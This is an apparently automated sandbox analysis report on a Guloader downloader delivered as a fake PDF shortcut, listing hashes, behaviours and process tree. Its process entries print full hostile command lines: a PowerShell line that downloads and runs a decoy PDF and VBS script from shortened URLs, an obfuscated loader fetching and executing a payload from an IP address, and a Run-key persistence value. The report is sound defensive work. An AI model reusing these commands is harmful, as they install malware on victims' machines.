Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-06-2023 00:36

Static task: static1

Behavioral task: behavioral1
Sample: RFQ No 41 26_06_2023.pdf.lnk
Resource: win7-20230621-en

Behavioral task: behavioral2
Sample: RFQ No 41 26_06_2023.pdf.lnk
Resource: win10v2004-20230621-en

General
Target: RFQ No 41 26_06_2023.pdf.lnk
Size: 2KB
MD5: ba180227c26bb151e9a9dddfb0a572af
SHA1: 2e52688c2280c246bf931fd130184f86d411bc5d
SHA256: 748c0ef7a63980d4e8064b14fb95ba51947bfc7d9ccf39c6ef614026a89c39e5
SHA512: 55da00767297a830f6209ee685d0956ae1e2a42562efcb64a46d028bfadd0bc615538e523279cf7b45d453b19c461808673d530bb45924b1807422792da4bbc7
Malware Config
Signatures
Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Blocklisted process makes network request (3 IoCs)
flow | pid  | Process
5    | 4896 | powershell.exe
7    | 4896 | powershell.exe
9    | 4896 | powershell.exe
Checks QEMU agent file (2 TTPs, 2 IoCs)
Checks presence of QEMU agent, possibly to detect virtualization.
description             | ioc                                  | Process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | ielowutil.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
description       | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | WScript.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
description     | ioc | Process
Key created     | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Software\Microsoft\Windows\CurrentVersion\Run | ielowutil.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lymph = "%Della% -w 1 $Venlig=(Get-ItemProperty -Path 'HKCU:\\bdello\\').Unacquis;%Della% ($Venlig)" | ielowutil.exe
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
pid  | Process
3544 | ielowutil.exe
3544 | ielowutil.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid  | Process
2324 | powershell.exe
3544 | ielowutil.exe
Suspicious use of SetThreadContext (1 IoCs)
description                         | pid  | Process        | procid_target
PID 2324 set thread context of 3544 | 2324 | powershell.exe | 113
Drops file in Windows directory (1 IoCs)
description  | ioc                          | Process
File created | C:\Windows\Tasks\Reilon.vbs | powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description       | ioc                                                           | Process
Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0      | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe

Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
Modifies registry class (1 IoCs)
description | ioc                                                                              | Process
Key created | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000_Classes\Local Settings | powershell.exe
Suspicious behavior: EnumeratesProcesses (24 IoCs)
pid  | Process
4896 | powershell.exe
4896 | powershell.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2324 | powershell.exe
2324 | powershell.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid  | Process
3544 | ielowutil.exe
Suspicious behavior: MapViewOfSection (12 IoCs)
pid  | Process
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
2324 | powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description             | pid  | Process
Token: SeDebugPrivilege | 4896 | powershell.exe
Token: SeDebugPrivilege | 2324 | powershell.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
pid  | Process
2232 | AcroRd32.exe
Suspicious use of SetWindowsHookEx (7 IoCs)
pid  | Process
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
2232 | AcroRd32.exe
3544 | ielowutil.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

Depth 1: C:\Windows\system32\cmd.exe
Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\RFQ No 41 26_06_2023.pdf.lnk"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 3560
Depth 2: \??\UNC\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "\\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" n; Invoke-WebRequest https://shorturl.at/iwAK9 -O C:\Users\Public\RFQ-INFO.pdf; C:\Users\Public\RFQ-INFO.pdf; Invoke-WebRequest https://shorturl.at/guDHW -O C:\Windows\Tasks\Reilon.vbs; C:\Windows\Tasks\Reilon.vbs
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4896
Depth 3: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\RFQ-INFO.pdf"
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2232
Depth 4: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Suspicious use of WriteProcessMemory
PID: 180
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D0C1A1371FE5BD4189A64546C8BE0F8 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 3516
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C673A00B3112AF4B859E5221BD0C6EB0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C673A00B3112AF4B859E5221BD0C6EB0 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
PID: 4100
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F976ACAEC40D434DF9AF8B49A5C4E62B --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 4088
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:1
PID: 4600
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C008F6B543B0A60AA9F99D9E6CBC7633 --mojo-platform-channel-handle=1892 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 4168
Depth 5: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7EC02E8EAB0E600EF2FF7FF10EE3E955 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 2636
Depth 3: C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Reilon.vbs"
- Checks computer location settings
PID: 3768
Depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Milj379 ([String]$Endoph){For($Episper=1; $Episper -lt $Endoph.Length-1; $Episper+=(1+1)){$Ddvgt=$Endoph.Substring($Episper, 1);$Fald=$Fald+$Ddvgt}$Fald;}$Gydep=Milj379 ' h tntPp : / / 1 9L4 .T5P5 .A2 2k4T. 1 8P3I/KkEnTg /uPNeGrRsSuZa s iHvSe .TiEnPfT ';$Fald01=Milj379 'CiPeSxP ';$Stryger = Milj379 'N\hsByAsMwFo w 6A4N\ WIiCn dCo wFs PFo wKeFr S hJePlTlA\Fvt1P.R0 \ pPo wFe rSsSh eClClB.deAx e ';.($Fald01) (Milj379 'A$RA dAvGe rPt iMz eH2T=O$Ae nFvM:TwSiTnHdti rL ') ;.($Fald01) (Milj379 ' $ S tRr yTgCe r =E$IA dIv egrLtPiEz e 2C+P$ISktPr yTg eSrA ') ;.($Fald01) (Milj379 'K$BE x p l oCiEtE = T( (bgOwHmPia wSiSn 3H2Z_MpsrGo c eCs sF -UFC P r o cBe sDsAIRd = $ { PEIAD } ) .UC oTm mhaHnLdiL iBnUeH) -PsTpElCiAt [Hc h aBrL] 3K4P ');.($Fald01) (Milj379 ' $FU nCl aGcseFrK B=L M$PE x pFlWoOi t [ $ ETx p l oAiCtL.Hc o uCnStq-J2 ] ');.($Fald01) (Milj379 ' $ MLoBdHtSaBgAnB=O(BTBe s t - Pta t hP $BS t rBy g e r )C -BAMn dK T(K[AI nKtAP t r ]S: : sPiBzAe T-EeYqB 8L)j ') ;if ($Modtagn) {.$Stryger $Unlacer;} else {;$Fald00=Milj379 ' SAt aRr t -UBSiPt saTVr a n s fCeOrD F-YSfo uArIc e $sGTySdieDp S- D eAsKtSiNnPa t iBoDn S$IASd v e rAt i z e 2A ';.($Fald01) (Milj379 ' $BA dUv e r t i z e 2 = $ eGnTv :Na p ppd a t a ') ;.($Fald01) (Milj379 'PIam pMo rSt -AMCo d uOl e PB iBt sgTAr a nFsMf eSrB ') ;$Advertize2=$Advertize2+'\opbrugende.Dal';while (-not $Joyf) {.($Fald01) (Milj379 'N$KJ oRy fF=I( TUe sItS-FPLa tAhS $FA dKvFe rPtFiIzHeS2S)b ') ;.($Fald01) $Fald00;.($Fald01) (Milj379 'FS t a r t -FSClEeNenpB B5 ');}.($Fald01) (Milj379 'l$ M iAl j 3B7 B=B GMeVtB-SC oHn t e n tC U$TAHdsv eAr t i z eS2A ');.($Fald01) (Milj379 ' $ HSacmFa rDtI B=T L[ S y sNtUe m .mCAoEnGviemrBt ]G: : FHrNo mLB a s eH6 4 SSt r i n g ( $ MTi lMj 3N7 )R ');.($Fald01) (Milj379 's$OF aSlVd 2F M=m K[ES yKs tCe mH.PTkeBxTt .FE n cGo d iDn g ]I: : A S C IcIS. GFe t SStDr iJnsg ( $ H a mfa rAtF) ');.($Fald01) (Milj379 'P$FR a wBnCeTs sSa = $ F aRlFd 2 . sUuDbGs t rFiPnMgr(P1A9 3T5 3P9 , 1 9S2F7 1C) ');.($Fald01) $Rawnessa;}"
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID: 2324
Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 5016

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3628

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 4128

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3400

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 4000

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 4324

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3192

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3784

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 1444

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 4236

Depth 5: C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3844
Depth 5: C:\Program Files (x86)\internet explorer\ielowutil.exe
Command line: "C:\Program Files (x86)\internet explorer\ielowutil.exe"
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID: 3544

Depth 1: C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 4004
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 2KB
MD5: 968cb9309758126772781b83adb8a28f
SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Filesize: 19KB
MD5: fb956aeb5b8c60d3bcc950b760982d94
SHA1: 16bfb1b290f8b69a57b38d63e5788b1ea0cf7067
SHA256: e1a29a4a91410562ceacba01d24370e460e40ac9f1709fe9c4f939ef455b9fc8
SHA512: 341e7ee45812acb3b2d90ee1abad1922310c22244a552a08dd4a7ed459d0ef46ae9fb18bd5695037bf0338875690c0dfc508422ab97c8fe62c0b2229635dd282

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 533KB
MD5: e418893ee8a2458d05377a7060cf1eaf
SHA1: e53279ed7acde7c41f7691af8ca6309e0c84b39a
SHA256: afbfc145affa16280139a70e92364d8cc9d71b951d3258df9a9855c0c1f1f567
SHA512: fa77845192cee1a18f8d33b6131ed3cc142c89b35d2a72d1cbfd7c7b7e92cda6e3aac5bcb0dd95e5ef1e9574245037d4cc7a7c03c26757bbfa841b455b172e1e

Filesize: 5KB
MD5: afe0083b8897c6aea94517f1df6589fc
SHA1: 0b24622ea072896e74ba8f35b965cbd5b1248a5f
SHA256: ab6c5af91d0e384cc011f3e3be12b13290bfc802ce5dd8a3788100f583d4b800
SHA512: ca449c9a49caa1a50a7c8c7805263063260db2e1e21cbae642fc3cf530a934e45b313fd9131c257c4a01d017234905648a81ee3edfcac9f2c28b65adf99afa32